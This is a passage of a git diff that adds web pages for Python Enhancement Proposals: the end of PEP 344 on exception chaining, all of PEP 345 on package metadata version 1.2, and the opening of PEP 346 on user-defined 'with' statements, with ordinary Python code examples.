Calling main() with the name of an existing file will trigger four +exceptions. The ultimate result will be an AttributeError due to the +misspelling of clos, whose __context__ points to a NameError due +to the misspelling of ex, whose __context__ points to an IOError +due to the file being read-only, whose __context__ points to a +ZeroDivisionError, whose __context__ attribute is None.

+

The proposed semantics are as follows (a short sketch illustrating these rules follows the list):

+
    +
  1. Each thread has an exception context initially set to None.
  2. Whenever an exception is raised, if the exception instance does not +already have a __context__ attribute, the interpreter sets it equal to +the thread’s exception context.
  3. Immediately after an exception is raised, the thread’s exception context is +set to the exception.
  4. Whenever the interpreter exits an except block by reaching the end or +executing a return, yield, continue, or break statement, +the thread’s exception context is set to None.
+
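
To make these rules concrete, here is a small sketch of how they would play out under the proposal (it is not executable in today’s Python, which has no __context__ attribute):

+
try:
+    1/0                        # rule 3: the thread's exception context
+                               # becomes this ZeroDivisionError
+except:
+    try:
+        raise KeyError('x')    # rule 2: __context__ is set to the
+                               # pending ZeroDivisionError
+    except KeyError, exc:
+        assert isinstance(exc.__context__, ZeroDivisionError)
+    # rule 4: leaving the except block resets the context to None
+
+
+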
+
+

Explicit Exception Chaining

+

The __cause__ attribute on exception objects is always initialized to +None. It is set by a new form of the raise statement:

+
raise EXCEPTION from CAUSE
+
+
+

which is equivalent to:

+
exc = EXCEPTION
+exc.__cause__ = CAUSE
+raise exc
+
+
+

In the following example, a database provides implementations for a few +different kinds of storage, with file storage as one kind. The database +designer wants errors to propagate as DatabaseError objects so that the +client doesn’t have to be aware of the storage-specific details, but doesn’t +want to lose the underlying error information:

+
class DatabaseError(StandardError):
+    pass
+
+class FileDatabase(Database):
+    def __init__(self, filename):
+        try:
+            self.file = open(filename)
+        except IOError, exc:
+            raise DatabaseError('failed to open') from exc
+
+
+

If the call to open() raises an exception, the problem will be reported as +a DatabaseError, with a __cause__ attribute that reveals the +IOError as the original cause.

+
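
A caller could then examine the chain; a sketch under the proposed semantics (the filename is arbitrary):

+
try:
+    FileDatabase('missing.db')
+except DatabaseError, exc:
+    print exc                  # failed to open
+    print exc.__cause__        # the underlying IOError
+
+
+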
+
+

Traceback Attribute

+

The following example illustrates the __traceback__ attribute:

+
def do_logged(file, work):
+    try:
+        work()
+    except Exception, exc:
+        write_exception(file, exc)
+        raise exc
+
+from traceback import format_tb
+
+def write_exception(file, exc):
+    ...
+    type = exc.__class__
+    message = str(exc)
+    lines = format_tb(exc.__traceback__)
+    file.write(... type ... message ... lines ...)
+    ...
+
+
+

In today’s Python, the do_logged() function would have to extract the +traceback from sys.exc_traceback or sys.exc_info() [2] and pass both +the value and the traceback to write_exception(). With the proposed +change, write_exception() simply gets one argument and obtains the +traceback using the __traceback__ attribute.

+

The proposed semantics are as follows:

+
    +
  1. Whenever an exception is caught, if the exception instance does not already +have a __traceback__ attribute, the interpreter sets it to the newly +caught traceback.
+
+
+

Enhanced Reporting

+

The default exception handler will be modified to report chained exceptions. +The chain of exceptions is traversed by following the __cause__ and +__context__ attributes, with __cause__ taking priority. In keeping +with the chronological order of tracebacks, the most recently raised exception +is displayed last; that is, the display begins with the description of the +innermost exception and backs up the chain to the outermost exception. The +tracebacks are formatted as usual, with one of the lines:

+
The above exception was the direct cause of the following exception:
+
+
+

or

+
During handling of the above exception, another exception occurred:
+
+
+

between tracebacks, depending whether they are linked by __cause__ or +__context__ respectively. Here is a sketch of the procedure:

+
def print_chain(exc):
+    if exc.__cause__:
+        print_chain(exc.__cause__)
+        print '\nThe above exception was the direct cause...'
+    elif exc.__context__:
+        print_chain(exc.__context__)
+        print '\nDuring handling of the above exception, ...'
+    print_exc(exc)
+
+
+

In the traceback module, the format_exception, print_exception, +print_exc, and print_last functions will be updated to accept an +optional chain argument, True by default. When this argument is +True, these functions will format or display the entire chain of +exceptions as just described. When it is False, these functions will +format or display only the outermost exception.

+
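
For instance, the updated functions could be called as follows (a sketch of the proposed interface; show() is a hypothetical helper, and the chain argument does not exist in today’s traceback module):

+
import traceback
+
+def show(exc):
+    # full chain, following __cause__ and __context__ (the default)
+    traceback.print_exception(exc.__class__, exc, exc.__traceback__)
+    # outermost exception only
+    traceback.print_exception(exc.__class__, exc, exc.__traceback__,
+                              chain=False)
+
+
+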

The cgitb module should also be updated to display the entire chain of +exceptions.

+
+
+

C API

+

The PyErr_Set* calls for setting exceptions will not set the +__context__ attribute on exceptions. PyErr_NormalizeException will +always set the traceback attribute to its tb argument and the +__context__ and __cause__ attributes to None.

+

A new API function, PyErr_SetContext(context), will help C programmers +provide chained exception information. This function will first normalize the +current exception so it is an instance, then set its __context__ +attribute. A similar API function, PyErr_SetCause(cause), will set the +__cause__ attribute.

+
+
+

Compatibility

+

Chained exceptions expose the type of the most recent exception, so they will +still match the same except clauses as they do now.

+

The proposed changes should not break any code unless it sets or uses +attributes named __context__, __cause__, or __traceback__ on +exception instances. As of 2005-05-12, the Python standard library contains +no mention of such attributes.

+
+
+

Open Issue: Extra Information

+

Walter Dörwald [11] expressed a desire to attach extra information to an +exception during its upward propagation without changing its type. This could +be a useful feature, but it is not addressed by this PEP. It could +conceivably be addressed by a separate PEP establishing conventions for other +informational attributes on exceptions.

+
+
+

Open Issue: Suppressing Context

+

As written, this PEP makes it impossible to suppress __context__, since +setting exc.__context__ to None in an except or finally clause +will only result in it being set again when exc is raised.

+
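
A sketch of the futile suppression attempt described above:

+
try:
+    1/0
+except:
+    exc = KeyError('replacement')
+    exc.__context__ = None     # attempt to suppress the chain ...
+    raise exc                  # ... but raising sets __context__ again
+
+
+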
+
+

Open Issue: Limiting Exception Types

+

To improve encapsulation, library implementors may want to wrap all +implementation-level exceptions with an application-level exception. One could +try to wrap exceptions by writing this:

+
try:
+    ... implementation may raise an exception ...
+except:
+    import sys
+    raise ApplicationError from sys.exc_value
+
+
+

or this:

+
try:
+    ... implementation may raise an exception ...
+except Exception, exc:
+    raise ApplicationError from exc
+
+
+

but both are somewhat flawed. It would be nice to be able to name the current +exception in a catch-all except clause, but that isn’t addressed here. +Such a feature would allow something like this:

+
try:
+    ... implementation may raise an exception ...
+except *, exc:
+    raise ApplicationError from exc
+
+
+
+
+

Open Issue: yield

+

The exception context is lost when a yield statement is executed; resuming +the frame after the yield does not restore the context. Addressing this +problem is out of the scope of this PEP; it is not a new problem, as +demonstrated by the following example:

+
>>> def gen():
+...     try:
+...         1/0
+...     except:
+...         yield 3
+...         raise
+...
+>>> g = gen()
+>>> g.next()
+3
+>>> g.next()
+TypeError: exceptions must be classes, instances, or strings
+(deprecated), not NoneType
+
+
+
+
+

Open Issue: Garbage Collection

+

The strongest objection to this proposal has been that it creates cycles +between exceptions and stack frames [12]. Collection of cyclic garbage (and +therefore resource release) can be greatly delayed:

+
>>> try:
+>>>     1/0
+>>> except Exception, err:
+>>>     pass
+
+
+

will introduce a cycle from err -> traceback -> stack frame -> err, keeping +all locals in the same scope alive until the next GC happens.

+

Today, these locals would go out of scope. There is a lot of code which +assumes that “local” resources – particularly open files – will be closed +quickly. If closure has to wait for the next GC, a program (which runs fine +today) may run out of file handles.

+
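
Until the issue is resolved, code that is sensitive to this could break the cycle by hand; a sketch (handle() is a placeholder for the real work):

+
try:
+    1/0
+except Exception, err:
+    try:
+        handle(err)
+    finally:
+        # break the err -> traceback -> stack frame -> err cycle
+        del err
+
+
+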

Making the __traceback__ attribute a weak reference would avoid the +problems with cyclic garbage. Unfortunately, it would make saving the +Exception for later (as unittest does) more awkward, and it would not +allow as much cleanup of the sys module.

+

A possible alternate solution, suggested by Adam Olsen, would be to instead +turn the reference from the stack frame to the err variable into a weak +reference when the variable goes out of scope [13].

+
+
+

Possible Future Compatible Changes

+

These changes are consistent with the appearance of exceptions as a single +object rather than a triple at the interpreter level.

+
    +
  • If PEP 340 or PEP 343 is accepted, replace the three (type, value, +traceback) arguments to __exit__ with a single exception argument.
  • Deprecate sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info() in favour of a single member, sys.exception.
  • Deprecate sys.last_type, sys.last_value, and sys.last_traceback +in favour of a single member, sys.last_exception.
  • Deprecate the three-argument form of the raise statement in favour of +the one-argument form.
  • Upgrade cgitb.html() to accept a single value as its first argument as +an alternative to a (type, value, traceback) tuple.
+
+
+

Possible Future Incompatible Changes

+

These changes might be worth considering for Python 3000.

+
    +
  • Remove sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info().
  • Remove sys.last_type, sys.last_value, and sys.last_traceback.
  • Replace the three-argument sys.excepthook with a one-argument API, and +change the cgitb module to match.
  • Remove the three-argument form of the raise statement.
  • Upgrade traceback.print_exception to accept an exception argument +instead of the type, value, and traceback arguments.
+
+
+

Acknowledgements

+

Brett Cannon, Greg Ewing, Guido van Rossum, Jeremy Hylton, Phillip J. Eby, +Raymond Hettinger, Walter Dörwald, and others.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0344.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0345/index.html b/pep-0345/index.html new file mode 100644 index 00000000000..aec704819ae --- /dev/null +++ b/pep-0345/index.html @@ -0,0 +1,670 @@ PEP 345 – Metadata for Python Software Packages 1.2 | peps.python.org
+
+


+ + +
+
+
+

PEP 345 – Metadata for Python Software Packages 1.2

+
+
Author:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
28-Apr-2005
+
Python-Version:
+
2.7
+
Post-History:
+
22-Dec-2009
+
Replaces:
+
314
+
Superseded-By:
+
566
+
Resolution:
+
Python-Dev thread
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes a mechanism for adding metadata to Python distributions. +It includes specifics of the field names, and their semantics and +usage.

+

This document specifies version 1.2 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314.

+

Version 1.2 of the metadata format adds a number of optional fields +designed to make third-party packaging of Python Software easier. +These fields are “Requires-Python”, “Requires-External”, “Requires-Dist”, +“Provides-Dist”, and “Obsoletes-Dist”. This version also changes the +“Platform” field. Three new fields were also added: “Maintainer”, +“Maintainer-email” and “Project-URL”.

+

Last, this new version also adds environment markers.

+
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple +times in a single PKG-INFO file. Other fields may only occur +once in a PKG-INFO file. Fields marked with “(optional)” are +not required to appear in a valid PKG-INFO file; all other +fields must be present.

+
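
Putting several of the fields described below together, an abbreviated PKG-INFO file might look like this (the values are taken from the examples in this section):

+
Metadata-Version: 1.2
+Name: BeagleVote
+Version: 1.0a2
+Summary: A module for collecting votes from beagles.
+Requires-Python: >=2.5,<2.7
+Requires-Dist: zope.interface (>3.5.0)
+Project-URL: Bug Tracker, https://github.com/pypa/setuptools/issues
+
+
+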
+

Metadata-Version

+

Version of the file format; “1.2” is the only legal value.

+

Example:

+
Metadata-Version: 1.2
+
+
+
+
+

Name

+

The name of the distribution.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the distribution’s version number. This +field must be in the format specified in PEP 440.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A Platform specification describing an operating system supported by +the distribution which is not listed in the “Operating System” Trove classifiers. +See “Classifier” below.

+

Examples:

+
Platform: ObscureUnix
+Platform: RareDOS
+
+
+
+
+

Supported-Platform (multiple use)

+

Binary distributions containing a PKG-INFO file will use the +Supported-Platform field in their metadata to specify the OS and +CPU for which the binary distribution was compiled. The semantics of +the Supported-Platform field are not specified in this PEP.

+

Example:

+
Supported-Platform: RedHat 7.2
+Supported-Platform: i386-win32-2791
+
+
+
+
+

Summary

+

A one-line summary of what the distribution does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the distribution that can run to several +paragraphs. Software that deals with metadata should not assume +any maximum size for this field, though people shouldn’t include +their instruction manual as the description.

+

The contents of this field can be written using reStructuredText +markup [1]. For programs that work with the metadata, supporting +markup is optional; programs can also display the contents of the +field as-is. This means that authors should be conservative in +the markup they use.

+

To support empty lines and lines with indentation with respect to +the RFC 822 format, any CRLF character has to be suffixed by 7 spaces +followed by a pipe (“|”) char. As a result, the Description field is +encoded into a folded field that can be interpreted by RFC 822#section-3.1.1 +parser.

+

Example:

+
Description: This project provides powerful math functions
+        |For example, you can use ``sum()`` to sum numbers:
+        |
+        |Example::
+        |
+        |    >>> sum(1, 2)
+        |    3
+        |
+
+
+

This encoding implies that any occurrences of a CRLF followed by 7 spaces +and a pipe char have to be replaced by a single CRLF when the field is unfolded +using a RFC 822 reader.

+
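
A minimal sketch of that unfolding rule in Python (unfold_description is a hypothetical helper, not part of distutils):

+
CRLF = '\r\n'
+
+def unfold_description(folded):
+    # CRLF + 7 spaces + '|' collapses back to a single CRLF
+    return folded.replace(CRLF + ' ' * 7 + '|', CRLF)
+
+
+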
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the distribution in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the distribution’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Download-URL

+

A string containing the URL from which this version of the distribution +can be downloaded. (This means that the URL can’t be something like +“…/BeagleVote-latest.tgz”, but instead must be “…/BeagleVote-0.45.tgz”.)

+
+
+

Author (optional)

+

A string containing the author’s name at a minimum; additional +contact information may be provided.

+

Example:

+
Author: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Author-email (optional)

+

A string containing the author’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +From: header.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

Maintainer (optional)

+

A string containing the maintainer’s name at a minimum; additional +contact information may be provided.

+

Note that this field is intended for use when a project is being +maintained by someone other than the original author: it should be +omitted if it is identical to Author.

+

Example:

+
Maintainer: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Maintainer-email (optional)

+

A string containing the maintainer’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +From: header.

+

Note that this field is intended for use when a project is being +maintained by someone other than the original author: it should be +omitted if it is identical to Author-email.

+

Example:

+
Maintainer-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License (optional)

+

Text indicating the license covering the distribution where the license +is not a selection from the “License” Trove classifiers. See +“Classifier” below. This field may also be used to specify a +particular version of a license which is named via the Classifier +field, or to indicate a variation or exception to such a license.

+

Examples:

+
License: This software may only be obtained by sending the
+        author a postcard, and then the user promises not
+        to redistribute it.
+
+License: GPL version 3, excluding DRM provisions
+
+
+
+
+

Classifier (multiple use)

+

Each entry is a string giving a single classification value +for the distribution. Classifiers are described in PEP 301.

+

Examples:

+
Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+
+
+
+
+

Requires-Dist (multiple use)

+

Each entry contains a string naming some other distutils +project required by this distribution.

+

The format of a requirement string is identical to that of a +distutils project name (e.g., as found in the Name: field), +optionally followed by a version declaration within parentheses.

+

The distutils project names should correspond to names as found +on the Python Package Index.

+

Version declarations must follow the rules described in +Version Specifiers.

+

Examples:

+
Requires-Dist: pkginfo
+Requires-Dist: PasteDeploy
+Requires-Dist: zope.interface (>3.5.0)
+
+
+
+
+

Provides-Dist (multiple use)

+

Each entry contains a string naming a Distutils project which +is contained within this distribution. This field must include +the project identified in the Name field, followed by the +version, in the form Name (Version).

+

A distribution may provide additional names, e.g. to indicate that +multiple projects have been bundled together. For instance, source +distributions of the ZODB project have historically included +the transaction project, which is now available as a separate +distribution. Installing such a source distribution satisfies +requirements for both ZODB and transaction.

+

A distribution may also provide a “virtual” project name, which does +not correspond to any separately-distributed project: such a name +might be used to indicate an abstract capability which could be supplied +by one of multiple projects. E.g., multiple projects might supply +RDBMS bindings for use by a given ORM: each project might declare +that it provides ORM-bindings, allowing other projects to depend +only on having at most one of them installed.

+

A version declaration may be supplied and must follow the rules described +in Version Specifiers. The distribution’s version number will be implied +if none is specified.

+

Examples:

+
Provides-Dist: OtherProject
+Provides-Dist: AnotherProject (3.4)
+Provides-Dist: virtual_package
+
+
+
+
+

Obsoletes-Dist (multiple use)

+

Each entry contains a string describing a distutils project’s distribution +which this distribution renders obsolete, meaning that the two projects +should not be installed at the same time.

+

Version declarations can be supplied. Version numbers must be in the +format specified in Version Specifiers.

+

The most common use of this field will be in case a project name +changes, e.g. Gorgon 2.3 gets subsumed into Torqued Python 1.0. +When you install Torqued Python, the Gorgon distribution should be +removed.

+

Examples:

+
Obsoletes-Dist: Gorgon
+Obsoletes-Dist: OtherProject (<3.0)
+
+
+
+
+

Requires-Python

+

This field specifies the Python version(s) that the distribution is +guaranteed to be compatible with.

+

Version numbers must be in the format specified in Version Specifiers.

+

Examples:

+
Requires-Python: 2.5
+Requires-Python: >2.1
+Requires-Python: >=2.3.4
+Requires-Python: >=2.5,<2.7
+
+
+
+
+

Requires-External (multiple use)

+

Each entry contains a string describing some dependency in the +system that the distribution is to be used with. This field is intended to +serve as a hint to downstream project maintainers, and has no +semantics which are meaningful to the distutils distribution.

+

The format of a requirement string is a name of an external +dependency, optionally followed by a version declaration within +parentheses.

+

Because they refer to non-Python software releases, version numbers +for this field are not required to conform to the format +specified in PEP 440: they should correspond to the +version scheme used by the external dependency.

+

Notice that there is no particular rule on the strings to be used.

+

Examples:

+
Requires-External: C
+Requires-External: libpng (>=1.5)
+
+
+
+
+

Project-URL (multiple-use)

+

A string containing an extra URL for the project and a label for it, +separated by a comma. This should be used when there are other URLs +to list in the metadata in addition to the “Home-page” field.

+

Examples:

+
Project-URL: Bug Tracker, https://github.com/pypa/setuptools/issues
+Project-URL: Documentation, https://setuptools.readthedocs.io/
+Project-URL: Funding, https://donate.pypi.org
+
+
+

The label is free text, with a maximum length of 32 characters. Notice +that distributions uploaded to PyPI will have these extra entries +displayed under the “Project links” section of their landing page.

+
+
+
+

Version Specifiers

+

Version specifiers are a series of conditional operators and +version numbers, separated by commas. Conditional operators +must be one of “<”, “>”, “<=”, “>=”, “==” and “!=”.

+

Any number of conditional operators can be specified, e.g. +the string “>1.0, !=1.3.4, <2.0” is a legal version declaration. +The comma (“,”) is equivalent to the and operator.

+
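
For illustration, such a declaration can be read as a list of (operator, version) clauses that must all hold; parse_version_spec below is a hypothetical helper, not part of distutils:

+
import re
+
+def parse_version_spec(spec):
+    # ">1.0, !=1.3.4, <2.0" ->
+    #     [('>', '1.0'), ('!=', '1.3.4'), ('<', '2.0')]
+    clauses = []
+    for clause in spec.split(','):
+        match = re.match(r'\s*(<=|>=|==|!=|<|>)\s*([\w.]+)\s*$', clause)
+        if match is None:
+            raise ValueError('illegal version clause: %r' % clause)
+        clauses.append((match.group(1), match.group(2)))
+    return clauses
+
+
+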

Each version number must be in the format specified in PEP 440.

+

When a version is provided, it always includes all versions that +start with the same value. For example, the “2.5” version of Python +will include versions like “2.5.2” or “2.5.3”. Pre and post releases +in that case are excluded. So in our example, versions like “2.5a1” are +not included when “2.5” is used. If the first version of the range is +required, it has to be explicitly given. In our example, it will be +“2.5.0”.

+

Notice that some projects might omit the “.0” suffix for the first release +of the “2.5.x” series:

+
    +
  • 2.5
  • 2.5.1
  • 2.5.2
  • etc.
+

In that case, “2.5.0” will have to be explicitly used to avoid any confusion +with the “2.5” notation that represents the full range. It is a recommended +practice to use schemes of the same length for a series to completely avoid +this problem.

+

Some Examples:

+
    +
  • Requires-Dist: zope.interface (3.1): any version that starts with 3.1, +excluding post or pre-releases.
  • Requires-Dist: zope.interface (3.1.0): any version that starts with +3.1.0, excluding post or pre-releases. Since that particular project doesn’t +use more than 3 digits, it also means “only the 3.1.0 release”.
  • Requires-Python: 3: Any Python 3 version, no matter which one, excluding +post or pre-releases.
  • Requires-Python: >=2.6,<3: Any version of Python 2.6 or 2.7, including +post releases of 2.6, pre and post releases of 2.7. It excludes pre releases +of Python 3.
  • Requires-Python: 2.6.2: Equivalent to “>=2.6.2,<2.6.3”. So this includes +only Python 2.6.2. Of course, if Python was numbered with 4 digits, it would +have included all versions of the 2.6.2 series.
  • Requires-Python: 2.5.0: Equivalent to “>=2.5.0,<2.5.1”.
  • Requires-Dist: zope.interface (3.1,!=3.1.3): any version that starts with +3.1, excluding post or pre-releases of 3.1 and excluding any version that +starts with “3.1.3”. For this particular project, this means: “any version +of the 3.1 series but not 3.1.3”. This is equivalent to: +“>=3.1,!=3.1.3,<3.2”.
+
+
+

Environment markers

+

An environment marker is a marker that can be added at the end of a +field after a semi-colon (“;”), to add a condition about the execution +environment.

+

Here are some examples of fields using such markers:

+
Requires-Dist: pywin32 (>1.0); sys.platform == 'win32'
+Obsoletes-Dist: pywin31; sys.platform == 'win32'
+Requires-Dist: foo (1,!=1.3); platform.machine == 'i386'
+Requires-Dist: bar; python_version == '2.4' or python_version == '2.5'
+Requires-External: libxslt; 'linux' in sys.platform
+
+
+

The micro-language behind this is the simplest possible: it compares only +strings, with the == and in operators (and their opposites), and +with the ability to combine expressions. This also makes it easy for +non-pythoneers to understand.

+

The pseudo-grammar is:

+
EXPR [in|==|!=|not in] EXPR [or|and] ...
+
+
+

where EXPR belongs to any of those:

+
    +
  • python_version = ‘%s.%s’ % (sys.version_info[0], sys.version_info[1])
  • python_full_version = sys.version.split()[0]
  • os.name = os.name
  • sys.platform = sys.platform
  • platform.version = platform.version()
  • platform.machine = platform.machine()
  • platform.python_implementation = platform.python_implementation()
  • a free string, like '2.4', or 'win32'
+

Notice that in is restricted to strings, meaning that it is not possible +to use other sequences like tuples or lists on the right side.

+
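
For illustration, each marker variable is an ordinary string computed from the running interpreter, and the marker itself is a plain boolean expression over such strings:

+
import sys
+
+python_version = '%s.%s' % (sys.version_info[0], sys.version_info[1])
+
+# A field such as
+#   Requires-Dist: bar; python_version == '2.4' or python_version == '2.5'
+# is honoured only when the expression below evaluates to True:
+keep_bar = python_version == '2.4' or python_version == '2.5'
+
+
+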

The fields that benefit from this marker are:

+
    +
  • Requires-External
  • Requires-Dist
  • Provides-Dist
  • Obsoletes-Dist
  • Classifier
+
+
+

Summary of Differences From PEP 314

+
    +
  • Metadata-Version is now 1.2.
  • Added the environment markers.
  • Changed fields:
      • Platform (syntax change)
      • Author-email (change to optional field)
  • Added fields:
      • Maintainer
      • Maintainer-email
      • Requires-Python
      • Requires-External
      • Requires-Dist
      • Provides-Dist
      • Obsoletes-Dist
      • Project-URL
  • Deprecated fields:
      • Requires (in favor of Requires-Dist)
      • Provides (in favor of Provides-Dist)
      • Obsoletes (in favor of Obsoletes-Dist)
+
+
+

References

+

This document specifies version 1.2 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314.

[1] reStructuredText markup: http://docutils.sourceforge.net/
+

Acknowledgements

+

Fred Drake, Anthony Baxter and Matthias Klose have all contributed to +the ideas presented in this PEP.

+

Tres Seaver, Jim Fulton, Marc-André Lemburg, Martin von Löwis, Tarek Ziadé, +David Lyon and other people at the Distutils-SIG have contributed to the +new updated version.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0345.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0346/index.html b/pep-0346/index.html new file mode 100644 index 00000000000..99f169b7bed --- /dev/null +++ b/pep-0346/index.html @@ -0,0 +1,1375 @@ PEP 346 – User Defined (“with”) Statements | peps.python.org
+
+


+ + +
+
+
+

PEP 346 – User Defined (“with”) Statements

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP is a combination of PEP 310’s “Reliable Acquisition/Release +Pairs” with the “Anonymous Block Statements” of Guido’s PEP 340. This +PEP aims to take the good parts of PEP 340, blend them with parts of +PEP 310 and rearrange the lot into an elegant whole. It borrows from +various other PEPs in order to paint a complete picture, and is +intended to stand on its own.

+
+
+

Author’s Note

+

During the discussion of PEP 340, I maintained drafts of this PEP as +PEP 3XX on my own website (since I didn’t have CVS access to update a +submitted PEP fast enough to track the activity on python-dev).

+

Since the first draft of this PEP, Guido wrote PEP 343 as a simplified +version of PEP 340. PEP 343 (at the time of writing) uses the exact +same semantics for the new statements as this PEP, but uses a slightly +different mechanism to allow generators to be used to write statement +templates. However, Guido has indicated that he intends to accept a +new PEP being written by Raymond Hettinger that will integrate PEP 288 +and PEP 325, and will permit a generator decorator like the one +described in this PEP to be used to write statement templates for PEP +343. The other difference was the choice of keyword (‘with’ versus +‘do’) and Guido has stated he will organise a vote on that in the +context of PEP 343.

+

Accordingly, the version of this PEP submitted for archiving on +python.org is to be WITHDRAWN immediately after submission. PEP 343 +and the combined generator enhancement PEP will cover the important +ideas.

+
+
+

Introduction

+

This PEP proposes that Python’s ability to reliably manage resources +be enhanced by the introduction of a new with statement that +allows factoring out of arbitrary try/finally and some +try/except/else boilerplate. The new construct is called +a ‘user defined statement’, and the associated class definitions are +called ‘statement templates’.

+

The above is the main point of the PEP. However, if that was all it +said, then PEP 310 would be sufficient and this PEP would be +essentially redundant. Instead, this PEP recommends additional +enhancements that make it natural to write these statement templates +using appropriately decorated generators. A side effect of those +enhancements is that it becomes important to appropriately deal +with the management of resources inside generators.

+

This is quite similar to PEP 343, but the exceptions that occur are +re-raised inside the generator’s frame, and the issue of generator +finalisation needs to be addressed as a result. The template +generator decorator suggested by this PEP also creates reusable +templates, rather than the single use templates of PEP 340.

+

In comparison to PEP 340, this PEP eliminates the ability to suppress +exceptions, and makes the user defined statement a non-looping +construct. The other main difference is the use of a decorator to +turn generators into statement templates, and the incorporation of +ideas for addressing iterator finalisation.

+

If all that seems like an ambitious operation… well, Guido was the +one to set the bar that high when he wrote PEP 340 :)

+
+
+

Relationship with other PEPs

+

This PEP competes directly with PEP 310, PEP 340 and PEP 343, +as those PEPs all describe alternative mechanisms for handling +deterministic resource management.

+

It does not compete with PEP 342 which splits off PEP 340’s +enhancements related to passing data into iterators. The associated +changes to the for loop semantics would be combined with the +iterator finalisation changes suggested in this PEP. User defined +statements would not be affected.

+

Neither does this PEP compete with the generator enhancements +described in PEP 288. While this PEP proposes the ability to +inject exceptions into generator frames, it is an internal +implementation detail, and does not require making that ability +publicly available to Python code. PEP 288 is, in part, about +making that implementation detail easily accessible.

+

This PEP would, however, make the generator resource release support +described in PEP 325 redundant - iterators which require +finalisation should provide an appropriate implementation of the +statement template protocol.

+
+
+

User defined statements

+

To steal the motivating example from PEP 310, correct handling of a +synchronisation lock currently looks like this:

+
the_lock.acquire()
+try:
+    # Code here executes with the lock held
+finally:
+    the_lock.release()
+
+
+

Like PEP 310, this PEP proposes that such code be able to be written +as:

+
with the_lock:
+    # Code here executes with the lock held
+
+
+

These user defined statements are primarily designed to allow easy +factoring of try blocks that are not easily converted to +functions. This is most commonly the case when the exception handling +pattern is consistent, but the body of the try block changes. +With a user-defined statement, it is straightforward to factor out the +exception handling into a statement template, with the body of the +try clause provided inline in the user code.

+

The term ‘user defined statement’ reflects the fact that the meaning +of a with statement is governed primarily by the statement +template used, and programmers are free to create their own statement +templates, just as they are free to create their own iterators for use +in for loops.

+
+

Usage syntax for user defined statements

+

The proposed syntax is simple:

+
with EXPR1 [as VAR1]:
+    BLOCK1
+
+
+
+
+

Semantics for user defined statements

+
the_stmt = EXPR1
+stmt_enter = getattr(the_stmt, "__enter__", None)
+stmt_exit = getattr(the_stmt, "__exit__", None)
+if stmt_enter is None or stmt_exit is None:
+    raise TypeError("Statement template required")
+
+VAR1 = stmt_enter() # Omit 'VAR1 =' if no 'as' clause
+exc = (None, None, None)
+try:
+    try:
+        BLOCK1
+    except:
+        exc = sys.exc_info()
+        raise
+finally:
+    stmt_exit(*exc)
+
+
+

Other than VAR1, none of the local variables shown above will be +visible to user code. Like the iteration variable in a for loop, +VAR1 is visible in both BLOCK1 and code following the user +defined statement.

+

Note that the statement template can only react to exceptions, it +cannot suppress them. See Rejected Options for an explanation as +to why.

+
+
+

Statement template protocol: __enter__

+

The __enter__() method takes no arguments, and if it raises an +exception, BLOCK1 is never executed. If this happens, the +__exit__() method is not called. The value returned by this +method is assigned to VAR1 if the as clause is used. Objects +with no other value to return should generally return self rather +than None to permit in-place creation in the with statement.

+

Statement templates should use this method to set up the conditions +that are to exist during execution of the statement (e.g. acquisition +of a synchronisation lock).

+

Statement templates which are not always usable (e.g. closed file +objects) should raise a RuntimeError if an attempt is made to call +__enter__() when the template is not in a valid state.

+
+
+

Statement template protocol: __exit__

+

The __exit__() method accepts three arguments which correspond to +the three “arguments” to the raise statement: type, value, and +traceback. All arguments are always supplied, and will be set to +None if no exception occurred. This method will be called exactly +once by the with statement machinery if the __enter__() method +completes successfully.

+

Statement templates perform their exception handling in this method. +If the first argument is None, it indicates non-exceptional +completion of BLOCK1 - execution either reached the end of block, +or early completion was forced using a return, break or +continue statement. Otherwise, the three arguments reflect the +exception that terminated BLOCK1.

+

Any exceptions raised by the __exit__() method are propagated to +the scope containing the with statement. If the user code in +BLOCK1 also raised an exception, that exception would be lost, and +replaced by the one raised by the __exit__() method.

+
+
+

Factoring out arbitrary exception handling

+

Consider the following exception handling arrangement:

+
SETUP_BLOCK
+try:
+    try:
+        TRY_BLOCK
+    except exc_type1, exc:
+        EXCEPT_BLOCK1
+    except exc_type2, exc:
+        EXCEPT_BLOCK2
+    except:
+        EXCEPT_BLOCK3
+    else:
